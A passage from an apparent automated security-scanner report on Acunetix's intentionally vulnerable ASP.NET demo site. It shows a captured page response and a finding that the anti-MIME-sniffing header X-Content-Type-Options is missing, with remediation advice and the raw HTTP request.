resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        32. POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (456 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Content-Length: 10985
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10985 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96Cp